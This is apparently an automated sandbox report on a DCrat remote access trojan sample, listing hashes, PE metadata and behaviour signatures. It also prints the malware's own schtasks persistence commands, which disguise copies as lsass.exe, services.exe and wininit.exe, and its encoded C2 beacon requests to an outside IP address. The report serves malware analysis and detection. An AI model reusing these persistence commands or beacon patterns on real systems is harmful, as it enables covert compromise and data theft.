analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

a28a2dac43cb3e22c3957bdcfe04aa1b.exe

Full analysis: https://app.any.run/tasks/0af4d91e-2c2d-4ffb-bce2-1a85a1769214
Verdict: Malicious activity
Threats:

DCrat, also known as Dark Crystal RAT, is a remote access trojan (RAT), which was first introduced in 2018. It is a modular malware that can be customized to perform different tasks. For instance, it can steal passwords, crypto wallet information, hijack Telegram and Steam accounts, and more. Attackers may use a variety of methods to distribute DCrat, but phishing email campaigns are the most common.

Analysis date: March 31, 2023, 23:25:09
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:
rat
backdoor
dcrat
evasion
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows
MD5:

A28A2DAC43CB3E22C3957BDCFE04AA1B

SHA1:

30050F435AC1A07311E109F9082FBDC71B89AF01

SHA256:

9EE95204029452B5BB9A79236BEB30A6440760DF8DB7743CDE3D0C8E01D397A0

SSDEEP:

98304:VF7qKmNA3fH/wbRd9H4yNRbVxMP31sAi92Dv6fv6mP0C68:L1munwbRd9YYRPM/6Ai9KSfy8nf

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Connects to the CnC server

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 316)
    • DCRAT was detected

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 316)
    • Steals credentials from Web Browsers

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 316)
    • Actions looks like stealing of personal data

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 316)
  • SUSPICIOUS

    • Executed via WMI

      • schtasks.exe (PID: 2980)
      • schtasks.exe (PID: 2692)
      • schtasks.exe (PID: 2824)
      • schtasks.exe (PID: 2156)
      • schtasks.exe (PID: 2396)
      • schtasks.exe (PID: 2604)
      • schtasks.exe (PID: 2064)
      • schtasks.exe (PID: 2832)
      • schtasks.exe (PID: 2436)
      • schtasks.exe (PID: 3000)
      • schtasks.exe (PID: 2820)
      • schtasks.exe (PID: 2128)
      • schtasks.exe (PID: 2636)
      • schtasks.exe (PID: 2916)
      • schtasks.exe (PID: 2308)
      • schtasks.exe (PID: 2508)
      • schtasks.exe (PID: 2224)
      • schtasks.exe (PID: 2152)
      • schtasks.exe (PID: 2992)
      • schtasks.exe (PID: 2664)
      • schtasks.exe (PID: 2160)
      • schtasks.exe (PID: 2496)
      • schtasks.exe (PID: 2340)
      • schtasks.exe (PID: 2684)
      • schtasks.exe (PID: 2088)
      • schtasks.exe (PID: 2244)
      • schtasks.exe (PID: 3012)
      • schtasks.exe (PID: 2560)
      • schtasks.exe (PID: 2924)
      • schtasks.exe (PID: 2992)
      • schtasks.exe (PID: 2900)
      • schtasks.exe (PID: 2948)
      • schtasks.exe (PID: 2244)
      • schtasks.exe (PID: 2916)
      • schtasks.exe (PID: 2300)
      • schtasks.exe (PID: 2464)
      • schtasks.exe (PID: 896)
      • schtasks.exe (PID: 2200)
      • schtasks.exe (PID: 2468)
      • schtasks.exe (PID: 412)
      • schtasks.exe (PID: 3000)
      • schtasks.exe (PID: 2336)
      • schtasks.exe (PID: 2892)
      • schtasks.exe (PID: 2544)
      • schtasks.exe (PID: 2812)
      • schtasks.exe (PID: 2932)
      • schtasks.exe (PID: 2200)
      • schtasks.exe (PID: 2620)
      • schtasks.exe (PID: 2332)
      • schtasks.exe (PID: 2996)
      • schtasks.exe (PID: 2952)
      • schtasks.exe (PID: 2844)
      • schtasks.exe (PID: 2076)
      • schtasks.exe (PID: 2244)
      • schtasks.exe (PID: 2600)
      • schtasks.exe (PID: 2176)
      • schtasks.exe (PID: 2364)
      • schtasks.exe (PID: 2508)
      • schtasks.exe (PID: 2744)
      • schtasks.exe (PID: 2452)
      • schtasks.exe (PID: 2884)
      • schtasks.exe (PID: 2496)
      • schtasks.exe (PID: 2772)
    • Creates executable files that already exist in Windows

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 996)
      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 2504)
    • Executable content was dropped or overwritten

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 996)
      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 2504)
    • The process creates files with name similar to system file names

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 996)
      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 2504)
    • Executing commands from a ".bat" file

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 996)
    • Probably delay the execution using 'w32tm.exe'

      • w32tm.exe (PID: 2696)
      • cmd.exe (PID: 2780)
    • Reads the Internet Settings

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 996)
      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 316)
      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 2504)
    • Starts CMD.EXE for commands execution

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 996)
    • Starts itself from another location

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 2504)
    • Checks for external IP

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 316)
    • Reads settings of System Certificates

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 316)
    • Adds/modifies Windows certificates

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 2504)
    • Reads browser cookies

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 316)
    • Process communicates with Telegram (possibly using it as an attacker's C2 server)

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 316)
    • Connects to the server without a host name

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 316)
  • INFO

    • The process checks LSA protection

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 996)
      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 2504)
      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 316)
    • Checks supported languages

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 996)
      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 2504)
      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 316)
    • Reads the machine GUID from the registry

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 996)
      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 2504)
      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 316)
    • Reads Environment values

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 996)
      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 2504)
      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 316)
    • Reads the computer name

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 996)
      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 2504)
      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 316)
    • Creates files in the program directory

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 996)
      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 2504)
    • Create files in a temporary directory

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 996)
      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 316)
    • Creates files or folders in the user directory

      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 2504)
      • a28a2dac43cb3e22c3957bdcfe04aa1b.exe (PID: 316)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (64.6)
.dll | Win32 Dynamic Link Library (generic) (15.4)
.exe | Win32 Executable (generic) (10.5)
.exe | Generic Win/DOS Executable (4.6)
.exe | DOS Executable Generic (4.6)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2022:07:24 15:13:08+00:00
ImageFileCharacteristics: Executable, No line numbers, No symbols, Large address aware, 32-bit
PEType: PE32
LinkerVersion: 2.25
CodeSize: 2929664
InitializedDataSize: 13824
UninitializedDataSize: -
EntryPoint: 0x1b1987
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows GUI
FileVersionNumber: 1.1.1.15
ProductVersionNumber: 1.1.1.15
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Win32
ObjectFileType: Dynamic link library
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Unicode
CompanyName: -
FileDescription: -
FileVersion: 1.1.1o
InternalName: libcrypto
OriginalFileName: libcrypto
ProductName: -
ProductVersion: 1.1.1o
LegalCopyright: Copyright 1998-2022 The OpenSSL Authors. All rights reserved.

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 24-Jul-2022 15:13:08
Detected languages:
  • English - United States
CompanyName: -
FileDescription: -
FileVersion: 1.1.1o
InternalName: libcrypto
OriginalFilename: libcrypto
ProductName: -
ProductVersion: 1.1.1o
LegalCopyright: Copyright 1998-2022 The OpenSSL Authors. All rights reserved.

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0090
Pages in file: 0x0003
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x0000
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x0000
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x00000080

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 7
Time date stamp: 24-Jul-2022 15:13:08
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_32BIT_MACHINE
  • IMAGE_FILE_EXECUTABLE_IMAGE
  • IMAGE_FILE_LARGE_ADDRESS_AWARE
  • IMAGE_FILE_LINE_NUMS_STRIPPED
  • IMAGE_FILE_LOCAL_SYMS_STRIPPED

Sections

Name
Virtual Address
Virtual Size
Raw Size
Charateristics
Entropy
0x002D8000
0x00280000
0x0002BA00
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
7.99804
.rsrc
0x002D6000
0x00002000
0x00000400
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
2.64412
.data
0x00558000
0x000E4000
0x000E2E00
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
7.98266

Resources

Title
Entropy
Size
Codepage
Language
Type
1
3.33524
708
UNKNOWN
English - United States
RT_VERSION

Imports

advapi32.dll
gdi32.dll
kernel32.dll
mscoree.dll
oleaut32.dll
shell32.dll
user32.dll
version.dll
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
102
Monitored processes
69
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start a28a2dac43cb3e22c3957bdcfe04aa1b.exe schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs cmd.exe no specs w32tm.exe no specs w32tm.exe no specs a28a2dac43cb3e22c3957bdcfe04aa1b.exe schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs #DCRAT a28a2dac43cb3e22c3957bdcfe04aa1b.exe

Process information

PID
CMD
Path
Indicators
Parent process
996"C:\Users\admin\AppData\Local\Temp\a28a2dac43cb3e22c3957bdcfe04aa1b.exe" C:\Users\admin\AppData\Local\Temp\a28a2dac43cb3e22c3957bdcfe04aa1b.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Version:
1.1.1o
Modules
Images
c:\users\admin\appdata\local\temp\a28a2dac43cb3e22c3957bdcfe04aa1b.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\ntdll.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\user32.dll
2604schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Windows\tracing\PowerTracker\System.exe'" /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
2692schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Windows\tracing\PowerTracker\System.exe'" /rl HIGHEST /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
2824schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Windows\tracing\PowerTracker\System.exe'" /rl HIGHEST /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
2980schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\Skype\wininit.exe'" /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\ntdll.dll
c:\windows\system32\schtasks.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
2064schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Users\All Users\Skype\wininit.exe'" /rl HIGHEST /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
2156schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\Skype\wininit.exe'" /rl HIGHEST /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
2396schtasks.exe /create /tn "servicess" /sc MINUTE /mo 11 /tr "'C:\Users\Public\Pictures\Sample Pictures\services.exe'" /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\schtasks.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleaut32.dll
2508schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\Public\Pictures\Sample Pictures\services.exe'" /rl HIGHEST /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\ole32.dll
c:\windows\system32\usp10.dll
2636schtasks.exe /create /tn "servicess" /sc MINUTE /mo 10 /tr "'C:\Users\Public\Pictures\Sample Pictures\services.exe'" /rl HIGHEST /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
Total events
7 662
Read events
7 606
Write events
52
Delete events
4

Modification events

(PID) Process:(996) a28a2dac43cb3e22c3957bdcfe04aa1b.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(996) a28a2dac43cb3e22c3957bdcfe04aa1b.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(996) a28a2dac43cb3e22c3957bdcfe04aa1b.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(996) a28a2dac43cb3e22c3957bdcfe04aa1b.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(2504) a28a2dac43cb3e22c3957bdcfe04aa1b.exeKey:HKEY_CURRENT_USER\Software\da59a69626d179b3aa7f6c53d6465bd5382def8f
Operation:writeName:d8081b475806e9f15df83834135a61801f743106
Value:
WyJDOlxcVXNlcnNcXGFkbWluXFxBcHBEYXRhXFxMb2NhbFxcVGVtcFxcYTI4YTJkYWM0M2NiM2UyMmMzOTU3YmRjZmUwNGFhMWIuZXhlIiwiQzpcXFdpbmRvd3NcXHRyYWNpbmdcXFBvd2VyVHJhY2tlclxcU3lzdGVtLmV4ZSIsIkM6XFxVc2Vyc1xcQWxsIFVzZXJzXFxTa3lwZVxcd2luaW5pdC5leGUiLCJDOlxcVXNlcnNcXFB1YmxpY1xcUGljdHVyZXNcXFNhbXBsZSBQaWN0dXJlc1xcc2VydmljZXMuZXhlIiwiQzpcXFdpbmRvd3NcXFRhc2tzXFxsc2Fzcy5leGUiLCJDOlxcVXNlcnNcXFB1YmxpY1xcTGlicmFyaWVzXFxTeXN0ZW0uZXhlIiwiQzpcXFdpbmRvd3NcXFRlbXBcXGNzcnNzLmV4ZSIsIkM6XFxVc2Vyc1xcQWxsIFVzZXJzXFxEb2N1bWVudHNcXGR3bS5leGUiLCJDOlxcVXNlcnNcXGFkbWluXFxQaWN0dXJlc1xcSWRsZS5leGUiLCJDOlxcV2luZG93c1xcdHJhY2luZ1xcUG93ZXJUcmFja2VyXFxjc3Jzcy5leGUiLCJDOlxcVXNlcnNcXFB1YmxpY1xcUGljdHVyZXNcXFNhbXBsZSBQaWN0dXJlc1xcc2VydmljZXMuZXhlIl0=
(PID) Process:(2504) a28a2dac43cb3e22c3957bdcfe04aa1b.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(2504) a28a2dac43cb3e22c3957bdcfe04aa1b.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(2504) a28a2dac43cb3e22c3957bdcfe04aa1b.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(2504) a28a2dac43cb3e22c3957bdcfe04aa1b.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(316) a28a2dac43cb3e22c3957bdcfe04aa1b.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\14C\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
Executable files
40
Suspicious files
10
Text files
48
Unknown types
22

Dropped files

PID
Process
Filename
Type
996a28a2dac43cb3e22c3957bdcfe04aa1b.exeC:\Users\Public\Pictures\Sample Pictures\services.exeexecutable
MD5:A28A2DAC43CB3E22C3957BDCFE04AA1B
SHA256:9EE95204029452B5BB9A79236BEB30A6440760DF8DB7743CDE3D0C8E01D397A0
996a28a2dac43cb3e22c3957bdcfe04aa1b.exeC:\Windows\Tasks\lsass.exeexecutable
MD5:A28A2DAC43CB3E22C3957BDCFE04AA1B
SHA256:9EE95204029452B5BB9A79236BEB30A6440760DF8DB7743CDE3D0C8E01D397A0
996a28a2dac43cb3e22c3957bdcfe04aa1b.exeC:\Windows\tracing\PowerTracker\System.exeexecutable
MD5:A28A2DAC43CB3E22C3957BDCFE04AA1B
SHA256:9EE95204029452B5BB9A79236BEB30A6440760DF8DB7743CDE3D0C8E01D397A0
996a28a2dac43cb3e22c3957bdcfe04aa1b.exeC:\ProgramData\Skype\wininit.exeexecutable
MD5:A28A2DAC43CB3E22C3957BDCFE04AA1B
SHA256:9EE95204029452B5BB9A79236BEB30A6440760DF8DB7743CDE3D0C8E01D397A0
996a28a2dac43cb3e22c3957bdcfe04aa1b.exeC:\Users\Public\Libraries\System.exeexecutable
MD5:A28A2DAC43CB3E22C3957BDCFE04AA1B
SHA256:9EE95204029452B5BB9A79236BEB30A6440760DF8DB7743CDE3D0C8E01D397A0
996a28a2dac43cb3e22c3957bdcfe04aa1b.exeC:\Users\Public\Documents\dwm.exeexecutable
MD5:A28A2DAC43CB3E22C3957BDCFE04AA1B
SHA256:9EE95204029452B5BB9A79236BEB30A6440760DF8DB7743CDE3D0C8E01D397A0
996a28a2dac43cb3e22c3957bdcfe04aa1b.exeC:\Windows\Temp\886983d96e3d3etext
MD5:1BA95A8FF1C261948AE2DB09F4B0F340
SHA256:86CD6FCF2BD5948E16B26E09C3BD898B7264062BE75216665D6E48644B53192B
996a28a2dac43cb3e22c3957bdcfe04aa1b.exeC:\ProgramData\Skype\56085415360792text
MD5:0D1498FAF8A0704DF213EBDC61801584
SHA256:34C3EECE82225353DF178502245ACF93CAE36AAFA96DD6DDE6D5138AA7DC2BD6
996a28a2dac43cb3e22c3957bdcfe04aa1b.exeC:\Users\Public\Pictures\Sample Pictures\c5b4cb5e9653cctext
MD5:F4864EA808BB1D7136E3AFA9221CD9D8
SHA256:5504B67FF786D5F1842990C3F26BA0A2040339AC8F6BFCDA319B7D58413AEA14
996a28a2dac43cb3e22c3957bdcfe04aa1b.exeC:\Users\admin\Pictures\Idle.exeexecutable
MD5:A28A2DAC43CB3E22C3957BDCFE04AA1B
SHA256:9EE95204029452B5BB9A79236BEB30A6440760DF8DB7743CDE3D0C8E01D397A0
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
104
TCP/UDP connections
7
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
316
a28a2dac43cb3e22c3957bdcfe04aa1b.exe
GET
62.109.20.14:80
http://62.109.20.14/Proton/BettereternalImage9/Temp/GeoWindowsSecureBetter/3protect/Js8generator/linuxSql/Longpollvoiddb/SecureBetter/HttpCdnImage/1private/Eternalrequest/Wp/Bigloadline0Update/GeneratorCpuTest/Cdn4/1/dbwordpress.php?KceKnSEJpDc0PprcS8dJLekea6jcH=vlZZCFJNshmW4TNnsZgAnocZup2Atq&lBtS1b0mmTFQ5hzjQRwNJ5H=GI9pWNIdBzB&e359000dbc8e270a3132dc34565389de=3gTZ1UmNzMWY1IDO5UzM5EWO1ETNyQmN3MTOmNTOjJjY5MmM5EDM1ADM2YjM0AzM0YzMykzM&9cc51d04bb97b9124574f405cfce076f=QNjZjMxUzNmR2MxAjNihDMlVTOlNGMyATO4MDOwYTZjFmYjdjY0UWN&d67774f54f475434990c74d9288eddd9=0VfiIiOiMDOzgDOwQTOmBzM5E2YxUmY0MDMwAjZiF2NkNzY5gjYiwiIzgzMjdzY4ATYiN2N1YGZiJ2NxQTMzEWN0EGOlhTO1QmN3EmZmV2YzIiOiYzY4gTOwAjNxcjZlljNlNDOjJzYiVDMkBDZ2MGO5UGZiwiI0AzMhRjY2ITMkBTOhVTNzMGNhlTN2kjZiZDM3MWOlZTZlZmN2MTM4IiOikjM4UmMjJTN1QmMwU2NwgDM1kjYzEzYwQGOkBDMhVTYis3W
RU
malicious
316
a28a2dac43cb3e22c3957bdcfe04aa1b.exe
GET
200
62.109.20.14:80
http://62.109.20.14/Proton/BettereternalImage9/Temp/GeoWindowsSecureBetter/3protect/Js8generator/linuxSql/Longpollvoiddb/SecureBetter/HttpCdnImage/1private/Eternalrequest/Wp/Bigloadline0Update/GeneratorCpuTest/Cdn4/1/dbwordpress.php?KceKnSEJpDc0PprcS8dJLekea6jcH=vlZZCFJNshmW4TNnsZgAnocZup2Atq&lBtS1b0mmTFQ5hzjQRwNJ5H=GI9pWNIdBzB&e359000dbc8e270a3132dc34565389de=3gTZ1UmNzMWY1IDO5UzM5EWO1ETNyQmN3MTOmNTOjJjY5MmM5EDM1ADM2YjM0AzM0YzMykzM&9cc51d04bb97b9124574f405cfce076f=QNjZjMxUzNmR2MxAjNihDMlVTOlNGMyATO4MDOwYTZjFmYjdjY0UWN&a95b79107f938c457172bbb968cbdd6e=0VfiEFWrZ1RklnRHRmeClmYwR2VkNnQGlEdBNFVRJ0UPBzbU5UevRVT4FUeNlXQq1kdFpXT21keXJiOiMDOzgDOwQTOmBzM5E2YxUmY0MDMwAjZiF2NkNzY5gjYiwiIzgzMjdzY4ATYiN2N1YGZiJ2NxQTMzEWN0EGOlhTO1QmN3EmZmV2YzIiOiYzY4gTOwAjNxcjZlljNlNDOjJzYiVDMkBDZ2MGO5UGZiwiI0AzMhRjY2ITMkBTOhVTNzMGNhlTN2kjZiZDM3MWOlZTZlZmN2MTM4IiOikjM4UmMjJTN